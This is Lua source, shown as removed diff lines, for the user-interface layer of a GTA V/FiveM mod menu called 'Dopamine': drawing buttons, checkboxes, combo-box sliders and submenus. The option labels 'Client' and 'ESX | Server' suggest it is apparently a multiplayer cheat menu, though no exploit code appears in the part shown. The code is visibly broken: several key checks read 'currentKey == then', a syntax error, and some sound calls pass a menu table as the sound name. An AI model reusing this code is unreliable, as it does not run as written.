- Dopamine.drawText(text, Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].x + Dopamine.menuProps.buttonTextXOffset, y - (Dopamine.menuProps.buttonHeight / 2) + Dopamine.menuProps.buttonTextYOffset, Dopamine.menuProps.buttonFont, textColor, Dopamine.menuProps.buttonScale, false, shadow)
- end
- if subText then
- Dopamine.drawText(subText, Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].x + Dopamine.menuProps.buttonTextXOffset, y - Dopamine.menuProps.buttonHeight / 2 + Dopamine.menuProps.buttonTextYOffset, Dopamine.menuProps.buttonFont, subTextColor, Dopamine.menuProps.buttonScale, false, shadow, true)
- end
- if Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].currentOption == Dopamine.menuProps.optionCount and arrowsprite then
- if not HasStreamedTextureDictLoaded('commonmenu') then Dopamine.natives.requestStreamedTextureDict('commonmenu', true) end
- if Dopamine.menuProps.menu_TextOutline then
- DrawSprite('commonmenu', 'arrowright', Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].x + Dopamine.menuProps.buttonTextXOffset + 0.240, y - (Dopamine.menuProps.buttonHeight / 2) + Dopamine.menuProps.buttonTextYOffset + 0.0125, 0.0245, 0.0365, 0.0, 0, 0, 0, 255)
- end
- DrawSprite('commonmenu', 'arrowright', Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].x + Dopamine.menuProps.buttonTextXOffset + 0.240, y - (Dopamine.menuProps.buttonHeight / 2) + Dopamine.menuProps.buttonTextYOffset + 0.0125, 0.0225, 0.0325, 0.0, Dopamine.mainColor.r, Dopamine.mainColor.g, Dopamine.mainColor.b, 255)
- elseif arrowsprite then
- if not HasStreamedTextureDictLoaded('commonmenu') then Dopamine.natives.requestStreamedTextureDict('commonmenu', true) end
- if Dopamine.menuProps.menu_TextOutline then
- DrawSprite('commonmenu', 'arrowright', Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].x + Dopamine.menuProps.buttonTextXOffset + 0.240, y - (Dopamine.menuProps.buttonHeight / 2) + Dopamine.menuProps.buttonTextYOffset + 0.0125, 0.0245, 0.0365, 0.0, 0, 0, 0, 255)
- end
- DrawSprite('commonmenu', 'arrowright', Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].x + Dopamine.menuProps.buttonTextXOffset + 0.240, y - (Dopamine.menuProps.buttonHeight / 2) + Dopamine.menuProps.buttonTextYOffset + 0.0125, 0.0225, 0.0325, 0.0, 175, 175, 175, 155)
- end
- if Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].currentOption == Dopamine.menuProps.optionCount and Dopamine.menuProps.menu_RectOverlay then
- if not HasStreamedTextureDictLoaded('deadline') then Dopamine.natives.requestStreamedTextureDict('deadline', true) end
- DrawSprite('deadline', 'deadline_trail_01', x, y, Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].width, Dopamine.menuProps.buttonHeight, 0.0, Dopamine.mainColor.r, Dopamine.mainColor.g, Dopamine.mainColor.b, 55)
- end
- end
- end
- local be_aN = 1
- function Dopamine.drawCheckbox(text, state)
- local x = Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].x + Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].width / 2
- local multiplier = nil
- if Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].currentOption <= Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].maxOptionCount and Dopamine.menuProps.optionCount <= Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].maxOptionCount then
- multiplier = Dopamine.menuProps.optionCount
- elseif Dopamine.menuProps.optionCount > Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].currentOption - Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].maxOptionCount and Dopamine.menuProps.optionCount <= Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].currentOption then
- multiplier = Dopamine.menuProps.optionCount - (Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].currentOption - Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].maxOptionCount)
- end
- if multiplier then
- local y = Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].y + Dopamine.menuProps.titleHeight + Dopamine.menuProps.buttonHeight + (Dopamine.menuProps.buttonHeight * multiplier) - Dopamine.menuProps.buttonHeight / 2
- local backgroundColor = nil
- local textColor = nil
- local shadow = false
- if Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].currentOption == Dopamine.menuProps.optionCount then
- backgroundColor = Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].menuFocusBackgroundColor
- textColor = Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].menuFocusTextColor
- else
- backgroundColor = Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].menuBackgroundColor
- textColor = Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].menuTextColor
- shadow = true
- end
- Dopamine.drawRect(x, y, Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].width, Dopamine.menuProps.buttonHeight, backgroundColor)
- Dopamine.drawText(text, Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].x + Dopamine.menuProps.buttonTextXOffset, y - (Dopamine.menuProps.buttonHeight / 2) + Dopamine.menuProps.buttonTextYOffset, Dopamine.menuProps.buttonFont, textColor, Dopamine.menuProps.buttonScale, false, shadow)
- if not HasStreamedTextureDictLoaded('helicopterhud') then Dopamine.natives.requestStreamedTextureDict('helicopterhud', true) end
- if not HasStreamedTextureDictLoaded('commonmenu') then Dopamine.natives.requestStreamedTextureDict('commonmenu', true) end
- if Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].currentOption == Dopamine.menuProps.optionCount then
- if state then
- if Dopamine.menuProps.selectedCheckboxStyle == 'New' then
- DrawSprite('helicopterhud', 'hud_outline', Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].x + Dopamine.menuProps.buttonTextXOffset + 0.235, y - (Dopamine.menuProps.buttonHeight / 2) + Dopamine.menuProps.buttonTextYOffset + 0.01375, 0.0225, 0.0325, 0.0, Dopamine.mainColor.r, Dopamine.mainColor.g, Dopamine.mainColor.b, 255)
- DrawSprite('commonmenu', 'shop_tick_icon', Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].x + Dopamine.menuProps.buttonTextXOffset + 0.235, y - (Dopamine.menuProps.buttonHeight / 2) + Dopamine.menuProps.buttonTextYOffset + 0.0125, 0.0325, 0.0425, 0.0, Dopamine.mainColor.r, Dopamine.mainColor.g, Dopamine.mainColor.b, 255)
- elseif Dopamine.menuProps.selectedCheckboxStyle == 'Old' then
- DrawSprite('commonmenu', 'shop_box_tick', Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].x + Dopamine.menuProps.buttonTextXOffset + 0.235, y - (Dopamine.menuProps.buttonHeight / 2) + Dopamine.menuProps.buttonTextYOffset + 0.0125, 0.0325, 0.0425, 0.0, Dopamine.mainColor.r, Dopamine.mainColor.g, Dopamine.mainColor.b, 255)
- end
- else
- if Dopamine.menuProps.selectedCheckboxStyle == 'New' then
- DrawSprite('helicopterhud', 'hud_lock', Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].x + Dopamine.menuProps.buttonTextXOffset + 0.235, y - (Dopamine.menuProps.buttonHeight / 2) + Dopamine.menuProps.buttonTextYOffset + 0.01375, 0.0225, 0.0325, 0.0, Dopamine.mainColor.r, Dopamine.mainColor.g, Dopamine.mainColor.b, 255)
- elseif Dopamine.menuProps.selectedCheckboxStyle == 'Old' then
- DrawSprite('commonmenu', 'shop_box_blank', Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].x + Dopamine.menuProps.buttonTextXOffset + 0.235, y - (Dopamine.menuProps.buttonHeight / 2) + Dopamine.menuProps.buttonTextYOffset + 0.0125, 0.0325, 0.0425, 0.0, Dopamine.mainColor.r, Dopamine.mainColor.g, Dopamine.mainColor.b, 255)
- end
- end
- else
- if state then
- if Dopamine.menuProps.selectedCheckboxStyle == 'New' then
- DrawSprite('helicopterhud', 'hud_outline', Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].x + Dopamine.menuProps.buttonTextXOffset + 0.235, y - (Dopamine.menuProps.buttonHeight / 2) + Dopamine.menuProps.buttonTextYOffset + 0.01375, 0.0225, 0.0325, 0.0, 155, 155, 155, 255)
- DrawSprite('commonmenu', 'shop_tick_icon', Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].x + Dopamine.menuProps.buttonTextXOffset + 0.235, y - (Dopamine.menuProps.buttonHeight / 2) + Dopamine.menuProps.buttonTextYOffset + 0.0125, 0.0325, 0.0425, 0.0, 155, 155, 155, 255)
- elseif Dopamine.menuProps.selectedCheckboxStyle == 'Old' then
- DrawSprite('commonmenu', 'shop_box_tick', Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].x + Dopamine.menuProps.buttonTextXOffset + 0.235, y - (Dopamine.menuProps.buttonHeight / 2) + Dopamine.menuProps.buttonTextYOffset + 0.0125, 0.0325, 0.0425, 0.0, 155, 155, 155, 255)
- end
- else
- if Dopamine.menuProps.selectedCheckboxStyle == 'New' then
- DrawSprite('helicopterhud', 'hud_lock', Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].x + Dopamine.menuProps.buttonTextXOffset + 0.235, y - (Dopamine.menuProps.buttonHeight / 2) + Dopamine.menuProps.buttonTextYOffset + 0.01375, 0.0225, 0.0325, 0.0, 155, 155, 155, 255)
- elseif Dopamine.menuProps.selectedCheckboxStyle == 'Old' then
- DrawSprite('commonmenu', 'shop_box_blank', Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].x + Dopamine.menuProps.buttonTextXOffset + 0.235, y - (Dopamine.menuProps.buttonHeight / 2) + Dopamine.menuProps.buttonTextYOffset + 0.0125, 0.0325, 0.0425, 0.0, 155, 155, 155, 255)
- end
- end
- end
- if Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].currentOption == Dopamine.menuProps.optionCount and Dopamine.menuProps.menu_RectOverlay then
- if not HasStreamedTextureDictLoaded('deadline') then Dopamine.natives.requestStreamedTextureDict('deadline', true) end
- DrawSprite('deadline', 'deadline_trail_01', x, y, Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].width, Dopamine.menuProps.buttonHeight, 0.0, Dopamine.mainColor.r, Dopamine.mainColor.g, Dopamine.mainColor.b, 55)
- end
- end
- end
- function Dopamine.createMenu(id, title)
- --[[Default settings]]
- table.insert(Dopamine.menus_list, id)
- Dopamine.menuProps.shitMenus[id] = {}
- Dopamine.menuProps.shitMenus[id].title = title
- Dopamine.menuProps.shitMenus[id].subTitle = 'by N~s~er~s~t~s~ig~s~el'
- Dopamine.menuProps.shitMenus[id].visible = false
- Dopamine.menuProps.shitMenus[id].previousMenu = nil
- Dopamine.menuProps.shitMenus[id].aboutToBeClosed = false
- Dopamine.menuProps.shitMenus[id].x = 0.0175
- Dopamine.menuProps.shitMenus[id].y = 0.025
- Dopamine.menuProps.shitMenus[id].width = 0.23
- Dopamine.menuProps.shitMenus[id].currentOption = 1
- Dopamine.menuProps.shitMenus[id].maxOptionCount = Dopamine.menuProps.maximumOptionCount
- Dopamine.menuProps.shitMenus[id].titleFont = 1
- Dopamine.menuProps.shitMenus[id].titleColor = { r = 0, g = 0, b = 0, a = 255 }
- Dopamine.menuProps.shitMenus[id].titleBackgroundColor = { r = 0, g = 0, b = 0, a = 255 }
- Dopamine.menuProps.shitMenus[id].titleBackgroundSprite = nil
- Dopamine.menuProps.shitMenus[id].menuTextColor = { r = 150, g = 150, b = 150, a = 255 }
- Dopamine.menuProps.shitMenus[id].menuSubTextColor = { r = 0, g = 0, b = 0, a = 255 }
- Dopamine.menuProps.shitMenus[id].menuFocusTextColor = { r = 155, g = 155, b = 155, a = 255 }
- Dopamine.menuProps.shitMenus[id].menuFocusBackgroundColor = { r = 0, g = 0, b = 0, a = 255 }
- Dopamine.menuProps.shitMenus[id].menuBackgroundColor = { r = 55, g = 55, b = 55, a = 255 }
- Dopamine.menuProps.shitMenus[id].subTitleBackgroundColor = { r = 35, g = 35, b = 35, a = 255 }
- Dopamine.menuProps.shitMenus[id].subTitleTextColor = { r = Dopamine.mainColor.r, g = Dopamine.mainColor.g, b = Dopamine.mainColor.b, a = 255 }
- Dopamine.menuProps.shitMenus[id].buttonPressedSound = { name = 'SELECT', set = 'HUD_FRONTEND_DEFAULT_SOUNDSET' } --[[]]
- Dopamine.debugPrint(tostring(id)..' menu created')
- end
- function Dopamine.createSubMenu(id, parent, subTitle)
- if Dopamine.menuProps.shitMenus[parent] then
- Dopamine.createMenu(id, Dopamine.menuProps.shitMenus[parent].title)
- if subTitle then
- Dopamine.setMenuProperty(id, 'subTitle', subTitle)
- else
- Dopamine.setMenuProperty(id, 'subTitle', Dopamine.menuProps.shitMenus[parent].subTitle)
- end
- Dopamine.setMenuProperty(id, 'previousMenu', parent)
- Dopamine.setMenuProperty(id, 'x', Dopamine.menuProps.shitMenus[parent].x)
- Dopamine.setMenuProperty(id, 'y', Dopamine.menuProps.shitMenus[parent].y)
- Dopamine.setMenuProperty(id, 'maxOptionCount', Dopamine.menuProps.shitMenus[parent].maxOptionCount)
- Dopamine.setMenuProperty(id, 'titleFont', Dopamine.menuProps.shitMenus[parent].titleFont)
- Dopamine.setMenuProperty(id, 'titleColor', Dopamine.menuProps.shitMenus[parent].titleColor)
- Dopamine.setMenuProperty(id, 'titleBackgroundColor', Dopamine.menuProps.shitMenus[parent].titleBackgroundColor)
- Dopamine.setMenuProperty(id, 'titleBackgroundSprite', Dopamine.menuProps.shitMenus[parent].titleBackgroundSprite)
- Dopamine.setMenuProperty(id, 'menuTextColor', Dopamine.menuProps.shitMenus[parent].menuTextColor)
- Dopamine.setMenuProperty(id, 'menuSubTextColor', Dopamine.menuProps.shitMenus[parent].menuSubTextColor)
- Dopamine.setMenuProperty(id, 'menuFocusTextColor', Dopamine.menuProps.shitMenus[parent].menuFocusTextColor)
- Dopamine.setMenuProperty(id, 'menuFocusBackgroundColor', Dopamine.menuProps.shitMenus[parent].menuFocusBackgroundColor)
- Dopamine.setMenuProperty(id, 'menuBackgroundColor', Dopamine.menuProps.shitMenus[parent].menuBackgroundColor)
- Dopamine.setMenuProperty(id, 'subTitleBackgroundColor', Dopamine.menuProps.shitMenus[parent].subTitleBackgroundColor)
- else
- Dopamine.debugPrint('Failed to create '..tostring(id)..' submenu: '..tostring(parent)..' parent menu doesn\'t exist')
- end
- end
- function Dopamine.openMenu(id)
- if id and Dopamine.menuProps.shitMenus[id] then
- Dopamine.natives.playSoundFrontend(-1, 'SELECT', 'HUD_FRONTEND_DEFAULT_SOUNDSET', true)
- Dopamine.setMenuVisible(id, true)
- Dopamine.debugPrint(tostring(id)..' menu opened')
- else
- Dopamine.debugPrint('Failed to open '..tostring(id)..' menu: it doesn\'t exist')
- end
- end
- function Dopamine.isMenuOpened(id)
- return Dopamine.isMenuVisible(id)
- end
- function Dopamine.isAnyMenuOpened()
- for id, _ in pairs(Dopamine.menuProps.shitMenus) do
- if Dopamine.isMenuVisible(id) then return true end
- end
- return false
- end
- function Dopamine.isMenuAboutToBeClosed()
- if Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu] then
- return Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].aboutToBeClosed
- else
- return false
- end
- end
- function Dopamine.closeMenu()
- if Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu] then
- if Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].aboutToBeClosed then
- Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].aboutToBeClosed = false
- Dopamine.setMenuVisible(Dopamine.menuProps.currentMenu, false)
- Dopamine.debugPrint(tostring(Dopamine.menuProps.currentMenu)..' menu closed')
- Dopamine.natives.playSoundFrontend(-1, 'QUIT', 'HUD_FRONTEND_DEFAULT_SOUNDSET', true)
- Dopamine.menuProps.optionCount = 0
- Dopamine.menuProps.currentMenu = nil
- Dopamine.menuProps.currentKey = nil
- else
- Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].aboutToBeClosed = true
- Dopamine.debugPrint(tostring(Dopamine.menuProps.currentMenu)..' menu about to be closed')
- end
- end
- end
- function Dopamine.button(text, subText, spriteData)
- local buttonText = text
- if subText then
- buttonText = '{ '..tostring(buttonText)..', '..tostring(subText)..' }'
- end
- if Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu] then
- Dopamine.menuProps.optionCount = Dopamine.menuProps.optionCount + 1
- local isCurrent = Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].currentOption == Dopamine.menuProps.optionCount
- --[[local actualSubText = ''
- if subText == 'Native' then
- actualSubText = '~g~'..subText
- elseif subText == 'Client' or subText == 'ESX | Client' then
- actualSubText = '~y~'..subText
- elseif subText == 'Server' or subText == 'ESX | Server' then
- actualSubText = '~r~'..subText
- else
- actualSubText = subText
- end]]
- Dopamine.drawButton(false, text, subText, spriteData)
- if isCurrent then
- if Dopamine.menuProps.currentKey == then
- Dopamine.natives.playSoundFrontend(-1, Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu], Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].buttonPressedSound.set, true)
- Dopamine.debugPrint(buttonText..' button pressed')
- return true
- elseif Dopamine.menuProps.currentKey == Dopamine.menuProps.keys.left or Dopamine.menuProps.currentKey == Dopamine.menuProps.keys.right then
- Dopamine.natives.playSoundFrontend(-1, 'NAV_UP_DOWN', 'HUD_FRONTEND_DEFAULT_SOUNDSET', true)
- end
- end
- return false
- else
- Dopamine.debugPrint('Failed to create '..buttonText..' button: '..tostring(Dopamine.menuProps.currentMenu)..' menu doesn\'t exist')
- return false
- end
- end
- function Dopamine.checkboxButton(text, state)
- local buttonText = text
- if Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu] then
- Dopamine.menuProps.optionCount = Dopamine.menuProps.optionCount + 1
- local isCurrent = Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].currentOption == Dopamine.menuProps.optionCount
- Dopamine.drawCheckbox(text, state)
- if isCurrent then
- if Dopamine.menuProps.currentKey == then
- Dopamine.natives.playSoundFrontend(-1, Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu], Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].buttonPressedSound.set, true)
- Dopamine.debugPrint(buttonText..' button pressed')
- return true
- elseif Dopamine.menuProps.currentKey == Dopamine.menuProps.keys.left or Dopamine.menuProps.currentKey == Dopamine.menuProps.keys.right then
- Dopamine.natives.playSoundFrontend(-1, 'NAV_UP_DOWN', 'HUD_FRONTEND_DEFAULT_SOUNDSET', true)
- end
- end
- return false
- else
- Dopamine.debugPrint('Failed to create '..buttonText..' button: '..tostring(Dopamine.menuProps.currentMenu)..' menu doesn\'t exist')
- return false
- end
- end
- function Dopamine.button2(text, subText, spriteData)
- local buttonText = text
- if subText then
- buttonText = '{ '..tostring(buttonText)..', '..tostring(subText)..' }'
- end
- if Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu] then
- Dopamine.menuProps.optionCount = Dopamine.menuProps.optionCount + 1
- local isCurrent = Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].currentOption == Dopamine.menuProps.optionCount
- Dopamine.drawButton(true, text, subText, spriteData)
- if isCurrent then
- if Dopamine.menuProps.currentKey == then
- Dopamine.natives.playSoundFrontend(-1, Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu], Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].buttonPressedSound.set, true)
- Dopamine.debugPrint(buttonText..' button pressed')
- return true
- elseif Dopamine.menuProps.currentKey == Dopamine.menuProps.keys.left or Dopamine.menuProps.currentKey == Dopamine.menuProps.keys.right then
- Dopamine.natives.playSoundFrontend(-1, 'NAV_UP_DOWN', 'HUD_FRONTEND_DEFAULT_SOUNDSET', true)
- end
- end
- return false
- else
- Dopamine.debugPrint('Failed to create '..buttonText..' button: '..tostring(Dopamine.menuProps.currentMenu)..' menu doesn\'t exist')
- return false
- end
- end
- function Dopamine.menuButton(text, id, subText, spriteData)
- if Dopamine.menuProps.shitMenus[id] then
- if Dopamine.button2(text, subText, spriteData) then
- Dopamine.setMenuVisible(Dopamine.menuProps.currentMenu, false)
- Dopamine.setMenuVisible(id, true, true)
- return true
- end
- else
- Dopamine.debugPrint('Failed to create '..tostring(text)..' menu button: '..tostring(id)..' submenu doesn\'t exist')
- end
- return false
- end
- function Dopamine.checkBox(text, checked, callback)
- --[[if Dopamine.button(text, checked and '~g~Enabled' or '~r~Disabled') then]]
- if Dopamine.checkboxButton(text, checked) then
- checked = not checked
- Dopamine.debugPrint(tostring(text)..' checkbox changed to '..tostring(checked))
- if callback then callback(checked) end
- return true
- end
- return false
- end
- function Dopamine.comboBox(text, items, currentIndex, selectedIndex, callback)
- local itemsCount = #items
- local selectedItem = items[currentIndex]
- local isCurrent = Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].currentOption == (Dopamine.menuProps.optionCount + 1)
- if itemsCount > 1 and isCurrent then
- selectedItem = '« '..tostring(selectedItem)..' »'
- end
- if Dopamine.button(text, selectedItem) then
- selectedIndex = currentIndex
- callback(currentIndex, selectedIndex)
- return true
- elseif isCurrent then
- if Dopamine.menuProps.currentKey == Dopamine.menuProps.keys.left then
- if currentIndex > 1 then currentIndex = currentIndex - 1 else currentIndex = itemsCount end
- elseif Dopamine.menuProps.currentKey == Dopamine.menuProps.keys.right then
- if currentIndex < itemsCount then currentIndex = currentIndex + 1 else currentIndex = 1 end
- end
- else
- currentIndex = selectedIndex
- end
- callback(currentIndex, selectedIndex)
- return false
- end
- function Dopamine.comboBoxSlider(text, items, currentIndex, selectedIndex, callback)
- local itemsCount = #items
- local selectedItem = items[currentIndex]
- local isCurrent = Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].currentOption == (Dopamine.menuProps.optionCount + 1)
- if itemsCount > 1 and isCurrent then
- selectedItem = tostring(selectedItem)
- end
- if Dopamine.button3(text, items, itemsCount, currentIndex) then
- selectedIndex = currentIndex
- callback(currentIndex, selectedIndex)
- return true
- elseif isCurrent then
- if Dopamine.menuProps.currentKey == Dopamine.menuProps.keys.left then
- if currentIndex > 1 then currentIndex = currentIndex - 1
- elseif currentIndex == 1 then currentIndex = 1 end
- elseif Dopamine.menuProps.currentKey == Dopamine.menuProps.keys.right then
- if currentIndex < itemsCount then currentIndex = currentIndex + 1
- elseif currentIndex == itemsCount then currentIndex = itemsCount end
- end
- else
- currentIndex = selectedIndex
- end
- callback(currentIndex, selectedIndex)
- return false
- end
- function Dopamine.drawButton3(text, items, itemsCount, currentIndex)
- local x = Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].x + Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].width / 2
- local multiplier = nil
- if Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].currentOption <= Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].maxOptionCount and Dopamine.menuProps.optionCount <= Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].maxOptionCount then
- multiplier = Dopamine.menuProps.optionCount
- elseif Dopamine.menuProps.optionCount > Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].currentOption - Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].maxOptionCount and Dopamine.menuProps.optionCount <= Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].currentOption then
- multiplier = Dopamine.menuProps.optionCount - (Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].currentOption - Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].maxOptionCount)
- end
- if multiplier then
- local y = Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].y + Dopamine.menuProps.titleHeight + Dopamine.menuProps.buttonHeight + (Dopamine.menuProps.buttonHeight * multiplier) - Dopamine.menuProps.buttonHeight / 2
- local backgroundColor = nil
- local textColor = nil
- local subTextColor = nil
- local rectBackgroundColor = nil
- local rectBackgroundLine = nil
- local shadow = false
- if Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].currentOption == Dopamine.menuProps.optionCount then
- backgroundColor = Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].menuFocusBackgroundColor
- textColor = Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].menuFocusTextColor
- subTextColor = Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].menuFocusTextColor
- rectBackgroundColor = { r = Dopamine.mainColor.r, g = Dopamine.mainColor.g, b = Dopamine.mainColor.b, a = 255 }
- rectBackgroundLine = { r = Dopamine.mainColor.r, g = Dopamine.mainColor.g, b = Dopamine.mainColor.b, a = 255 }
- else
- backgroundColor = Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].menuBackgroundColor
- textColor = Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].menuTextColor
- subTextColor = Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].menuSubTextColor
- rectBackgroundColor = Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].menuTextColor
- rectBackgroundLine = {r = 155, g = 155, b = 155, a = 150}
- shadow = true
- end
- local sliderWidth = ((Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].width / 3) / itemsCount)
- local subtractionToX = ((sliderWidth * (currentIndex + 1)) - (sliderWidth * currentIndex)) / 2
- local XOffset = 0.16
- local stabilizer = 1
- --[[ Draw order from top to bottom]]
- if itemsCount >= 40 then
- stabilizer = 1.005
- end
- Dopamine.drawRect(x, y, Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].width, Dopamine.menuProps.buttonHeight, backgroundColor) --[[ Button Rectangle -2.15]]
- Dopamine.drawRect(((Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].x + 0.1675) + (subtractionToX * itemsCount)) / stabilizer, y, sliderWidth * (itemsCount - 1) + 0.001, Dopamine.menuProps.buttonHeight / 2 + 0.002, rectBackgroundLine)
- Dopamine.drawRect(((Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].x + 0.1675) + (subtractionToX * itemsCount)) / stabilizer, y, sliderWidth * (itemsCount - 1), Dopamine.menuProps.buttonHeight / 2, {r = 10, g = 10, b = 10, a = 150})
- Dopamine.drawRect(((Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].x + 0.1675) + (subtractionToX * currentIndex)) / stabilizer, y, sliderWidth * (currentIndex - 1), Dopamine.menuProps.buttonHeight / 2, rectBackgroundColor)
- Dopamine.drawText(text, Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].x + Dopamine.menuProps.buttonTextXOffset, y - (Dopamine.menuProps.buttonHeight / 2) + Dopamine.menuProps.buttonTextYOffset, Dopamine.menuProps.buttonFont, textColor, Dopamine.menuProps.buttonScale, false, shadow)
- local CurrentItem = tostring(items[currentIndex])
- if string.len(CurrentItem) == 1 then XOffset = 0.1650
- elseif string.len(CurrentItem) == 2 then XOffset = 0.1625
- elseif string.len(CurrentItem) == 3 then XOffset = 0.16015
- elseif string.len(CurrentItem) == 4 then XOffset = 0.1585
- elseif string.len(CurrentItem) == 5 then XOffset = 0.1570
- elseif string.len(CurrentItem) >= 6 then XOffset = 0.1555
- end
- Dopamine.drawText(items[currentIndex], ((Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].x + XOffset) + 0.04) / stabilizer, y - (Dopamine.menuProps.buttonHeight / 2.15) + Dopamine.menuProps.buttonTextYOffset, Dopamine.menuProps.buttonFont, {r = 255, g = 255, b = 255, a = 255}, Dopamine.menuProps.buttonScale, false, shadow) --[[ Current Item Text]]
- if Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].currentOption == Dopamine.menuProps.optionCount and Dopamine.menuProps.menu_RectOverlay then
- if not HasStreamedTextureDictLoaded('deadline') then Dopamine.natives.requestStreamedTextureDict('deadline', true) end
- DrawSprite('deadline', 'deadline_trail_01', x, y, Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].width, Dopamine.menuProps.buttonHeight, 0.0, Dopamine.mainColor.r, Dopamine.mainColor.g, Dopamine.mainColor.b, 55)
- end
- end
- end
- function Dopamine.button3(text, items, itemsCount, currentIndex)
- local buttonText = text
- if Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu] then
- Dopamine.menuProps.optionCount = Dopamine.menuProps.optionCount + 1
- local isCurrent = Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].currentOption == Dopamine.menuProps.optionCount
- Dopamine.drawButton3(text, items, itemsCount, currentIndex)
- if isCurrent then
- if Dopamine.menuProps.currentKey == then
- Dopamine.natives.playSoundFrontend(-1, Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu], Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].buttonPressedSound.set, true)
- Dopamine.debugPrint(buttonText..' button pressed')
- return true
- elseif Dopamine.menuProps.currentKey == Dopamine.menuProps.keys.left or Dopamine.menuProps.currentKey == Dopamine.menuProps.keys.right then
- Dopamine.natives.playSoundFrontend(-1, 'NAV_UP_DOWN', 'HUD_FRONTEND_DEFAULT_SOUNDSET', true)
- end
- end
- return false
- else
- Dopamine.debugPrint('Failed to create '..buttonText..' button: '..tostring(Dopamine.menuProps.currentMenu)..' menu doesn\'t exist')
- return false
- end
- end
